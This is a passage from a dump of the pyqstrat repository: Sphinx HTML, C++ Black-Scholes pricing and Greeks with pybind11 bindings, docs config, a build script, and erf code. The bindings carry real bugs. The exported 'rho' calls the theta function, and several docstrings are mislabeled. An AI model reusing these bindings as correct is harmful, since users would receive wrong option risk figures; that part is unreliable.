class=\"p\">(</span><span class=\"n\">size</span><span class=\"o\">=</span><span class=\"n\">size</span><span class=\"p\">)</span> <span 
class=\"o\">*</span> <span class=\"n\">dte</span> <span class=\"o\">/</span> <span class=\"mi\">10</span>\n <span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">({</span><span class=\"s1\">&#39;dte&#39;</span><span class=\"p\">:</span> <span class=\"n\">dte</span><span class=\"p\">,</span> <span class=\"s1\">&#39;put_call&#39;</span><span class=\"p\">:</span> <span class=\"n\">put_call</span><span class=\"p\">,</span> <span class=\"s1\">&#39;year&#39;</span><span class=\"p\">:</span> <span class=\"n\">year</span><span class=\"p\">,</span> <span class=\"s1\">&#39;delta&#39;</span><span class=\"p\">:</span> <span class=\"n\">delta</span><span class=\"p\">,</span> <span class=\"s1\">&#39;premium&#39;</span><span class=\"p\">:</span> <span class=\"n\">premium</span><span class=\"p\">})</span>\n \n <span class=\"n\">labels</span> <span class=\"o\">=</span> <span class=\"p\">{</span><span class=\"s1\">&#39;premium&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Premium $&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;year&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Year&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;dte&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Days to Expiry&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;delta_rnd&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Delta&#39;</span><span class=\"p\">}</span>\n <span class=\"n\">secy_line_config</span> <span class=\"o\">=</span> <span class=\"n\">LineConfig</span><span class=\"p\">(</span><span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n \n <span class=\"n\">ip</span> <span class=\"o\">=</span> <span class=\"n\">InteractivePlot</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">,</span> \n <span class=\"n\">labels</span><span class=\"p\">,</span> \n <span class=\"n\">transform_func</span><span class=\"o\">=</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transform</span><span class=\"p\">,</span>\n <span class=\"n\">stat_func</span><span class=\"o\">=</span><span class=\"n\">MeanWithCI</span><span class=\"p\">(</span><span class=\"n\">ci_level</span><span class=\"o\">=</span><span class=\"mi\">95</span><span class=\"p\">),</span>\n <span class=\"n\">plot_func</span><span class=\"o\">=</span><span class=\"n\">LineGraphWithDetailDisplay</span><span class=\"p\">(</span><span class=\"n\">line_configs</span><span class=\"o\">=</span><span class=\"p\">{</span><span class=\"s1\">&#39;put&#39;</span><span class=\"p\">:</span> <span class=\"n\">secy_line_config</span><span class=\"p\">}),</span> <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n \n <span class=\"n\">ip</span><span class=\"o\">.</span><span class=\"n\">create_pivot</span><span class=\"p\">(</span><span class=\"s1\">&#39;delta_rnd&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;premium&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;put_call&#39;</span><span class=\"p\">,</span> <span class=\"n\">dimensions</span><span class=\"o\">=</span><span class=\"p\">{</span><span class=\"s1\">&#39;year&#39;</span><span class=\"p\">:</span> <span class=\"mi\">2018</span><span class=\"p\">,</span> <span class=\"s1\">&#39;dte&#39;</span><span 
class=\"p\">:</span> <span class=\"kc\">None</span><span class=\"p\">})</span></div>\n \n<div class=\"viewcode-block\" id=\"TestInteractivePlot.transform\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.TestInteractivePlot.transform\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">transform</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">seterr</span><span class=\"p\">(</span><span class=\"s1\">&#39;raise&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"s1\">&#39;delta_rnd&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">percentile_buckets</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">abs</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"o\">.</span><span class=\"n\">delta</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">),</span> <span class=\"mi\">10</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">data</span></div></div>\n \n \n<span class=\"k\">if</span> <span class=\"vm\">__name__</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;__main__&#39;</span><span class=\"p\">:</span>\n <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">testmod</span><span class=\"p\">(</span><span class=\"n\">optionflags</span><span class=\"o\">=</span><span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">NORMALIZE_WHITESPACE</span> <span class=\"o\">|</span> <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">ELLIPSIS</span><span class=\"p\">)</span>\n <span class=\"n\">unittest</span><span class=\"o\">.</span><span class=\"n\">main</span><span class=\"p\">(</span><span class=\"n\">argv</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;first-arg-is-ignored&#39;</span><span class=\"p\">],</span> <span class=\"n\">exit</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span>\n <span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"s1\">&#39;done&#39;</span><span class=\"p\">)</span>\n<span class=\"c1\"># $$_end_code</span>\n</pre></div>\n\n </div>\n \n </div>\n </div>\n <div class=\"sphinxsidebar\" role=\"navigation\" aria-label=\"main navigation\">\n <div class=\"sphinxsidebarwrapper\">\n<h1 class=\"logo\"><a href=\"../../index.html\">pyqstrat</a></h1>\n\n\n\n\n\n\n\n\n<h3>Navigation</h3>\n<p class=\"caption\" role=\"heading\"><span class=\"caption-text\">Contents:</span></p>\n<ul>\n<li class=\"toctree-l1\"><a class=\"reference internal\" href=\"../../modules.html\">pyqstrat</a></li>\n</ul>\n\n<div class=\"relations\">\n<h3>Related Topics</h3>\n<ul>\n <li><a href=\"../../index.html\">Documentation overview</a><ul>\n <li><a href=\"../index.html\">Module code</a><ul>\n </ul></li>\n </ul></li>\n</ul>\n</div>\n<div id=\"searchbox\" style=\"display: none\" role=\"search\">\n <h3 id=\"searchlabel\">Quick search</h3>\n <div class=\"searchformwrapper\">\n 
<form class=\"search\" action=\"../../search.html\" method=\"get\">\n <input type=\"text\" name=\"q\" aria-labelledby=\"searchlabel\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\" spellcheck=\"false\"/>\n <input type=\"submit\" value=\"Go\" />\n </form>\n </div>\n</div>\n<script>document.getElementById('searchbox').style.display = \"block\"</script>\n\n\n\n\n\n\n\n\n </div>\n </div>\n <div class=\"clearer\"></div>\n </div>\n <div class=\"footer\">\n &copy;2018, Sal Abbasi.\n \n |\n Powered by <a href=\"http://sphinx-doc.org/\">Sphinx 5.1.1</a>\n &amp; <a href=\"https://github.com/bitprophet/alabaster\">Alabaster 0.7.12</a>\n \n </div>\n\n \n\n \n </body>\n</html>" }, { "alpha_fraction": 0.6917098164558411, "alphanum_fraction": 0.7176165580749512, "avg_line_length": 26.5, "blob_id": "40e49ef3dbd7208912db7fb271b9915dbcbb5cfd", "content_id": "2c8dbb279af6303a2b1bdcb6a5b8bf000dc62179", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 386, "license_type": "permissive", "max_line_length": 85, "num_lines": 14, "path": "/pyqstrat/cpp/options/pybind.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#include <pybind11/pybind11.h>\n\nnamespace py = pybind11;\nusing namespace pybind11::literals;\nusing namespace std;\n\nvoid init_pybind_options(py::module &); //Initialize the black scholes options module\n\nPYBIND11_MODULE(pyqstrat_cpp, m) {\n init_pybind_options(m);\n m.attr(\"__name__\") = \"pyqstrat.pyqstrat_cpp\";\n py::options options;\n options.disable_function_signatures();\n}\n\n" }, { "alpha_fraction": 0.4826427698135376, "alphanum_fraction": 0.5035461187362671, "avg_line_length": 35.35293960571289, "blob_id": "ddb75a6fac5537b4a607222d281ba20b97620fa0", "content_id": "f4ea02f6e9c49bdd4e4b141cdb85358f6214fca6", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8037, "license_type": "permissive", "max_line_length": 139, "num_lines": 221, "path": "/pyqstrat/cpp/options/pybind_options.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\n#include <pybind11/functional.h>\n#include <pybind11/chrono.h>\n#include <pybind11/iostream.h>\n#include <pybind11/numpy.h>\n\n#include \"options.hpp\"\n\nnamespace py = pybind11;\nusing namespace pybind11::literals;\n\nvoid init_pybind_options(py::module &m) {\n m.def(\"_pdf\", py::vectorize(pdf), \"x\"_a,\n R\"pqdoc(\n Probability density function of normal distribution\n Args:\n x (float): random variable\n Returns:\n float: pdf of the random variable\n )pqdoc\");\n \n m.def(\"cdf\", py::vectorize(cdf), \"x\"_a,\n R\"pqdoc(\n Cumulative density function of normal distribution\n Args:\n x (float): random variable\n Returns:\n float: cdf of the random variable\n )pqdoc\");\n \n m.def(\"d1\", py::vectorize(d1),\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n d1 from Black Scholes\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float): Annualized dividend yield. 
Use 0.01 for 1%\n Returns:\n float:\n )pqdoc\");\n \n m.def(\"d2\", py::vectorize(d2),\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n d2 from Black Scholes\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float): Annualized dividend yield. Use 0.01 for 1%\n Returns:\n float:\n )pqdoc\");\n \n m.def(\"black_scholes_price\", py::vectorize(black_scholes_price),\n \"call\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute Euroepean option price\n Args:\n call (bool): True for a call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option price\n )pqdoc\");\n \n m.def(\"delta\", py::vectorize(delta),\n \"call\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option delta\n Args:\n call (bool): True for a call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option delta\n )pqdoc\");\n \n m.def(\"theta\", py::vectorize(theta),\n \"call\"_a,\n \"F\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option theta per day. This is Black Scholes formula theta divided by 365 to give us the customary theta per day\n Args:\n call (bool): True for a call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option theta\n )pqdoc\");\n \n m.def(\"gamma\", py::vectorize(_gamma),\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option gamma.\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option gamma\n )pqdoc\");\n \n m.def(\"vega\", &vega,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option vega. This is Black Scholes formula vega divided by 100 so we get rho per 1% change in interest rate\n Args:\n S (float): Spot price. 
For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option vega\n )pqdoc\");\n \n m.def(\"rho\", py::vectorize(theta),\n \"call\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option rho. This is Black Scholes formula rho divided by 100 so we get rho per 1% change in interest rate\n Args:\n call (bool): True for a European call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option theta\n )pqdoc\");\n \n m.def(\"implied_vol\", py::vectorize(implied_vol),\n \"call\"_a,\n \"price\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute implied volatility for a European option.\n Args:\n call (bool): True for a call option, False for a put\n price (float): The option premium\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Implied volatility. For 1% we return 0.01\n )pqdoc\");\n}\n\n\n\n" }, { "alpha_fraction": 0.5381382703781128, "alphanum_fraction": 0.5667157173156738, "avg_line_length": 37.06399917602539, "blob_id": "5bbb863cd7648fd6c587b5c34d30661a22f67d8f", "content_id": "029bde50d709e949872a3eb193af630f78b28c29", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4759, "license_type": "permissive", "max_line_length": 125, "num_lines": 125, "path": "/pyqstrat/cpp/options/options.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//Adaoted from py_vollib black_scholes_merton analytical greeks\n#include <iostream>\n#include <cmath>\n#include <iomanip>\n#include <limits>\n#include \"options.hpp\"\n\nusing namespace std;\n\nconst double PI = 3.14159265358979323846264338327950288; // From M_PI definition\n\n// pdf\ndouble pdf(double x) {\n return ( 1.0 / (sqrt( 2 * PI))) * exp(-0.5 * x * x);\n}\n\n// cdf\ndouble cdf(double x) {\n return std::erfc(-x / std::sqrt(2)) /2;\n}\n\ndouble d1(double S, double K, double t, double r, double sigma, double q) {\n return (log(S / K) + ((r - q)+ 0.5 * sigma * sigma) * t) / (sigma * sqrt(t));\n}\n\ndouble d2(double S, double K, double t, double r, double sigma, double q) {\n return d1(S, K, t, r, sigma, q) - sigma * sqrt(t);\n}\n\ndouble black_scholes_price(bool call, double S, double K, double t, double r, double sigma, double q) {\n if (call) {\n return cdf(d1(S, K, t, r, sigma, q)) * S * exp(-q * t) - cdf(d2(S, K, t, r, sigma, q)) * K * exp(-r * t);\n } else {\n return cdf(-d2(S, K, t, r, sigma, q)) * K * exp(-r * t) - cdf(-d1(S, K, t, r, sigma, q)) * S * exp(-q * t);\n }\n}\n\ndouble delta(bool call, double S, double K, double t, double r, double sigma, double q) {\n double D1 = d1(S, K, t, r, sigma, 
q);\n if (call)\n return exp(-q * t) * cdf(D1);\n else\n return -exp(-q * t) * cdf(-D1);\n}\n\ndouble theta(bool call, double S, double K, double t, double r, double sigma, double q) {\n // The text book analytical formula does not divide by 365,\n // but in practice theta is defined as the change in price\n // for each day change in t, hence we divide by 365.\n \n double D1 = d1(S, K, t, r, sigma, q);\n double D2 = d2(S, K, t, r, sigma, q);\n double first_term = (S* exp(-q * t) * pdf(D1) * sigma) / (2 * sqrt(t));\n \n if (call) {\n double second_term = -q * S * exp(-q * t) * cdf(D1);\n double third_term = r * K * exp(-r * t) * cdf(D2);\n return - (first_term + second_term + third_term) / 365.0;\n } else {\n double second_term = -q * S * exp(-q * t) * cdf(-D1);\n double third_term = r * K * exp(-r * t) * cdf(-D2);\n return (-first_term + second_term + third_term) / 365.0;\n }\n}\n\ndouble _gamma(double S, double K, double t, double r, double sigma, double q) {\n double D1 = d1(S, K, t, r, sigma, q);\n double numerator = exp(-q * t) * pdf(D1);\n double denominator = S * sigma * sqrt(t);\n return numerator / denominator;\n}\n\ndouble vega(double S, double K, double t, double r, double sigma, double q) {\n //The text book analytical formula does not multiply by .01,\n //but in practice vega is defined as the change in price\n //for each 1 percent change in IV, hence we multiply by 0.01.\n double D1 = d1(S, K, t, r, sigma, q);\n return S * exp(-q * t) * pdf(D1) * sqrt(t) * 0.01;\n}\n\ndouble rho(bool call, double S, double K, double t, double r, double sigma, double q) {\n //The text book analytical formula does not multiply by .01,\n //but in practice rho is defined as the change in price\n //for each 1 percent change in r, hence we multiply by 0.01.\n double D2 = d2(S, K, t, r, sigma, q);\n if (call)\n return t * K * exp(-r * t) * cdf(D2) * .01;\n else\n return -t * K * exp(-r * t) * cdf(-D2) * .01;\n}\n\ndouble implied_vol(bool call, double price, double S, double K, double t, double r, double q) {\n double dcf = exp(-1.0 * r * t);\n double undiscounted_price = price / dcf;\n double F = S * exp((r - q) * t); // Compute forward price\n double iv = implied_volatility_from_a_transformed_rational_guess(undiscounted_price, F, K, t, call ? 
1.0 : -1.0);\n if (iv == std::numeric_limits<double>::max() || iv == -std::numeric_limits<double>::max()) return NAN;\n \n //cout << \"iv: \" << iv << \" undiscounted premium: \" << undiscounted_premium << \" forward_or_spot: \" << forward_or_spot <<\n //\" strike: \" << strike << \" t: \" << t << \" put_call_flag: \" << put_call_flag << endl;\n return iv;\n}\n\nint test_options() {\n double S = 9.3;\n double K = 10.0;\n double r = 0.01;\n double t = 1.0;\n double q = 0.01;\n double p = 1.0;\n bool call = false;\n double sigma = implied_vol(call, p, S, K, t, r, q);\n std::cout << std::fixed;\n std::cout << std::setprecision(10);\n \n cout << \"implied vol: \" << sigma << endl;\n sigma = 0.15;\n cout << \"price: \" << black_scholes_price(call, S, K, t, r, sigma, q) << endl;\n cout << \"delta: \" << delta(call, S, K, t, r, sigma, q) << endl;\n cout << \"gamma: \" << _gamma(S, K, t, r, sigma, q) << endl;\n cout << \"theta: \" << theta(call, S, K, t, r, sigma, q) << endl;\n cout << \"vega: \" << vega(S, K, t, r, sigma, q) << endl;\n cout << \"rho: \" << rho(call, S, K, t, r, sigma, q) << endl;\n return 0;\n}\n\n" }, { "alpha_fraction": 0.55069500207901, "alphanum_fraction": 0.55069500207901, "avg_line_length": 16.597122192382812, "blob_id": "3bc57987a063dfd8827a385d5821ad35dc2e621c", "content_id": "c2bcb57f6555ff0af70a7f10b91197001cff91e1", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2446, "license_type": "permissive", "max_line_length": 42, "num_lines": 139, "path": "/apidocs/source/pyqstrat.rst", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "pyqstrat package\n================\n\nSubmodules\n----------\n\n\npyqstrat.pq\\_utils module\n-------------------------\n\n.. automodule:: pyqstrat.pq_utils\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.pq\\_types module\n-------------------------\n\n.. automodule:: pyqstrat.pq_types\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.pq\\_io module\n----------------------\n\n.. automodule:: pyqstrat.pq_io\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.holiday\\_calendars module\n----------------------------------\n\n.. automodule:: pyqstrat.holiday_calendars\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.account module\n-----------------------\n\n.. automodule:: pyqstrat.account\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.strategy module\n-------------------------\n\n.. automodule:: pyqstrat.strategy\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.portfolio module\n-------------------------\n\n.. automodule:: pyqstrat.portfolio\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.optimize module\n------------------------\n\n.. automodule:: pyqstrat.optimize\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.plot module\n--------------------\n\n.. automodule:: pyqstrat.plot\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.evaluator module\n-------------------------\n\n.. automodule:: pyqstrat.evaluator\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.pyqstrat\\_cpp module\n-----------------------------\n\n.. automodule:: pyqstrat.pyqstrat_cpp\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\t\t \npyqstrat.pyqstrat\\_io module\n-----------------------------\n\n.. 
automodule:: pyqstrat.pyqstrat_io\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\npyqstrat.interactive\\_plot module\n---------------------------------\n\n.. automodule:: pyqstrat.interactive_plot\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\t\t \npyqstrat.markets module\n-------------------------------------\n\n.. automodule:: pyqstrat.markets\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\nModule contents\n---------------\n\n.. automodule:: pyqstrat\n :members:\n :undoc-members:\n :show-inheritance:\n" }, { "alpha_fraction": 0.5968992114067078, "alphanum_fraction": 0.5968992114067078, "avg_line_length": 17.428571701049805, "blob_id": "e82b1dd6ec462904e4292c7970615833382a6aa6", "content_id": "1271b59b77dd9802f7f4c8b0edb3504bccb02609", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "permissive", "max_line_length": 37, "num_lines": 7, "path": "/apidocs/build_docs.sh", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -x\nrm -Rf ./build/\nsphinx-build -M html \"source\" \"build\"\nrm -Rf ../docs/*\ncp -R ./build/html/* ../docs/\n" }, { "alpha_fraction": 0.30927786231040955, "alphanum_fraction": 0.4102625846862793, "avg_line_length": 44.52967071533203, "blob_id": "04f2c2de814c6d8497eba2b23df902d6b1ff4248", "content_id": "196d3ad7d23728c50d2a948dc4fbd8bb7663f85f", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 20716, "license_type": "permissive", "max_line_length": 218, "num_lines": 455, "path": "/pyqstrat/cpp/lets_be_rational/erf_cody.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// Original Fortran code taken from http://www.netlib.org/specfun/erf, compiled with f2c, and adapted by hand.\n//\n// Created with command line f2c -C++ -c -a -krd -r8 cody_erf.f\n//\n// Translated by f2c (version 20100827).\n//\n\n//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n\n#if defined( _DEBUG ) || defined( BOUNDS_CHECK_STL_ARRAYS )\n#define _SECURE_SCL 1\n#define _SECURE_SCL_THROWS 1\n#define _SCL_SECURE_NO_WARNINGS\n#define _HAS_ITERATOR_DEBUGGING 0\n#else\n#define _SECURE_SCL 0\n#endif\n#if defined(_MSC_VER)\n# define NOMINMAX // to suppress MSVC's definitions of min() and max()\n// These four pragmas are the equivalent to /fp:fast.\n# pragma float_control( except, off )\n# pragma float_control( precise, off )\n# pragma fp_contract( on )\n# pragma fenv_access( off )\n#endif\n\n#include \"normaldistribution.h\"\n#include <math.h>\n#include <float.h>\n\nnamespace {\n inline double d_int(const double x){ return( (x>0) ? 
floor(x) : -floor(-x) ); }\n}\n\n/*< SUBROUTINE CALERF(ARG,RESULT,JINT) >*/\ndouble calerf(double x, const int jint) {\n\n static const double a[5] = { 3.1611237438705656,113.864154151050156,377.485237685302021,3209.37758913846947,.185777706184603153 };\n static const double b[4] = { 23.6012909523441209,244.024637934444173,1282.61652607737228,2844.23683343917062 };\n static const double c__[9] = { .564188496988670089,8.88314979438837594,66.1191906371416295,298.635138197400131,881.95222124176909,1712.04761263407058,2051.07837782607147,1230.33935479799725,2.15311535474403846e-8 };\n static const double d__[8] = { 15.7449261107098347,117.693950891312499,537.181101862009858,1621.38957456669019,3290.79923573345963,4362.61909014324716,3439.36767414372164,1230.33935480374942 };\n static const double p[6] = { .305326634961232344,.360344899949804439,.125781726111229246,.0160837851487422766,6.58749161529837803e-4,.0163153871373020978 };\n static const double q[5] = { 2.56852019228982242,1.87295284992346047,.527905102951428412,.0605183413124413191,.00233520497626869185 };\n\n static const double zero = 0.;\n static const double half = .5;\n static const double one = 1.;\n static const double two = 2.;\n static const double four = 4.;\n static const double sqrpi = 0.56418958354775628695;\n static const double thresh = .46875;\n static const double sixten = 16.;\n\n double y, del, ysq, xden, xnum, result;\n\n /* ------------------------------------------------------------------ */\n /* This packet evaluates erf(x), erfc(x), and exp(x*x)*erfc(x) */\n /* for a real argument x. It contains three FUNCTION type */\n /* subprograms: ERF, ERFC, and ERFCX (or DERF, DERFC, and DERFCX), */\n /* and one SUBROUTINE type subprogram, CALERF. The calling */\n /* statements for the primary entries are: */\n /* Y=ERF(X) (or Y=DERF(X)), */\n /* Y=ERFC(X) (or Y=DERFC(X)), */\n /* and */\n /* Y=ERFCX(X) (or Y=DERFCX(X)). */\n /* The routine CALERF is intended for internal packet use only, */\n /* all computations within the packet being concentrated in this */\n /* routine. The function subprograms invoke CALERF with the */\n /* statement */\n /* CALL CALERF(ARG,RESULT,JINT) */\n /* where the parameter usage is as follows */\n /* Function Parameters for CALERF */\n /* call ARG Result JINT */\n /* ERF(ARG) ANY REAL ARGUMENT ERF(ARG) 0 */\n /* ERFC(ARG) ABS(ARG) .LT. XBIG ERFC(ARG) 1 */\n /* ERFCX(ARG) XNEG .LT. ARG .LT. XMAX ERFCX(ARG) 2 */\n /* The main computation evaluates near-minimax approximations */\n /* from \"Rational Chebyshev approximations for the error function\" */\n /* by W. J. Cody, Math. Comp., 1969, PP. 631-638. This */\n /* transportable program uses rational functions that theoretically */\n /* approximate erf(x) and erfc(x) to at least 18 significant */\n /* decimal digits. The accuracy achieved depends on the arithmetic */\n /* system, the compiler, the intrinsic functions, and proper */\n /* selection of the machine-dependent constants. */\n /* ******************************************************************* */\n /* ******************************************************************* */\n /* Explanation of machine-dependent constants */\n /* XMIN = the smallest positive floating-point number. */\n /* XINF = the largest positive finite floating-point number. */\n /* XNEG = the largest negative argument acceptable to ERFCX; */\n /* the negative of the solution to the equation */\n /* 2*exp(x*x) = XINF. 
*/\n /* XSMALL = argument below which erf(x) may be represented by */\n /* 2*x/sqrt(pi) and above which x*x will not underflow. */\n /* A conservative value is the largest machine number X */\n /* such that 1.0 + X = 1.0 to machine precision. */\n /* XBIG = largest argument acceptable to ERFC; solution to */\n /* the equation: W(x) * (1-0.5/x**2) = XMIN, where */\n /* W(x) = exp(-x*x)/[x*sqrt(pi)]. */\n /* XHUGE = argument above which 1.0 - 1/(2*x*x) = 1.0 to */\n /* machine precision. A conservative value is */\n /* 1/[2*sqrt(XSMALL)] */\n /* XMAX = largest acceptable argument to ERFCX; the minimum */\n /* of XINF and 1/[sqrt(pi)*XMIN]. */\n // The numbers below were preselected for IEEE .\n static const double xinf = 1.79e308;\n static const double xneg = -26.628;\n static const double xsmall = 1.11e-16;\n static const double xbig = 26.543;\n static const double xhuge = 6.71e7;\n static const double xmax = 2.53e307;\n /* Approximate values for some important machines are: */\n /* XMIN XINF XNEG XSMALL */\n /* CDC 7600 